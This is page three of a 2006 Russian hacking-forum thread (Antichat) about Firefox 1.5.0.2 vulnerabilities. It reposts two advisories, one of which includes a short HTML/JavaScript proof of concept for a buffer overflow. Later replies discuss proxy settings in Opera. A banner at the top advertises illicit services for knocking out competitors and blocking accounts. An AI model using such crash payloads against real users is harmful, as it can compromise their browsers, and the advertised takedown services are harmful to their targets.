Форум АНТИЧАТ - Множественные уязвимости в Mozilla Firefox

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Защита ОС: вирусы, антивирусы, файрволы.
Множественные уязвимости в Mozilla Firefox

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

19.04.2006, 16:17

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

update:
Не успела выйти последняя версия популярного браузера Mozilla Firefox (1.5.0.2), как тут же сообщили о наличии уязвимости в этом браузере. Как указывается в описании, обычно Вэб-сайты не ссылаются на локальные (с точки зрения посетителя) ресурсы. Однако наличие уязвимости может позволить получить доступ к лоакльному файлу, открываемому в браузере, при помощи URI типа file:. Для этого необходимо заманить посетителя на специальным образом сформированную страницу и убедить при нажатии на правую кнопку мыши выбрать "View Image" на рисунке, который он не видит. Так как на настоящий момент патча не существует, рекомендуется не пользоваться этой "особенностью".
Опубликовано: 18.04.2006
http://www.fssr.ru/hz.php?name=News&...ticle&sid=5896

__________________
ПИУ-ПИУ...

#22

25.04.2006, 07:51

c411k

Reservists Of Antichat - Level 6

Регистрация: 16.07.2005

Сообщений: 653

Провел на форуме:
8854279

Репутация: 2727

25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

Код:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea> 
  <script> 
       var textarea = document.getElementsByName("x_OtherInfo"); 
       textarea=textarea.item(0); 
           var htmlarea = document.createElement("div"); 
       htmlarea.className = "htmlarea";  
       textarea.parentNode.insertBefore(htmlarea, textarea); 
       var iframe = document.createElement("iframe"); 
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document; 
                 doc.designMode = "on"; 
                 doc.open(); 
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus() 
  doc.close(); 
  </script>
</textarea>

http://www.securitylab.ru/vulnerability/266229.php

__________________
ПИУ-ПИУ...

#23

25.04.2006, 16:43

Macroeject

Познающий

Регистрация: 29.01.2006

Сообщений: 98

Провел на форуме:
168930

Репутация: 13

Цитата:

Ну старенькие дырочки в файервоксе ети да и имхо как уже говорили опера рулез! Про ie я вообще молчу!

в Operе я прокси немогу поставить,как не пытался уже...могеть подскажешь?

#24

25.04.2006, 18:01

NeMiNeM

Постоянный

Регистрация: 22.08.2005

Сообщений: 540

Провел на форуме:
4372175

Репутация: 1221

Macroeject

Tools-->Preferences-->Advanced-->Network-->Proxy Servers

Потом Tools-->Quick Preferences-->Enable Proxy Servers

#25

25.04.2006, 18:14

bxN5

Постоянный

Регистрация: 08.01.2006

Сообщений: 865

Провел на форуме:
3279330

Репутация: 343

Отправить сообщение для bxN5 с помощью ICQ

а терь по русски

Инструменты-->Быстрая настройка-->Включить прокси сервера
Ввобщем качаеш прогу hide ip platinum запускаеш она находит проксик а потом делаеш выше сказаное и все=)

#26

25.04.2006, 18:23

gLAnce

Познающий

Регистрация: 24.04.2006

Сообщений: 33

Провел на форуме:
193665

Репутация: 50

а теперь по французки:

Les instruments-> les Préférences-> Avancé-> le Réseau-> les Serveurs Par procuration Ïî ò î ì Les instruments-> les Préférences Rapides-> Permettent aux Serveurs Par procuration

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Множественные уязвимости в INVISION POWER BOARD 2.1.x	GreenBear	Уязвимости	6	02.03.2006 21:36
В Mozilla Firefox найдены критические уязвимости	dinar_007	Мировые новости	0	03.02.2006 19:59
Вышла в свет финальная версия Mozilla Firefox 1.5	Ruax	Мировые новости	0	02.12.2005 21:32
Действующие уязвимости почтовых систем РФ	Maxmen	E-Mail	16	12.12.2004 16:48
Взлом wmshop	Xalegi	Уязвимости	0	29.11.2004 01:44

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход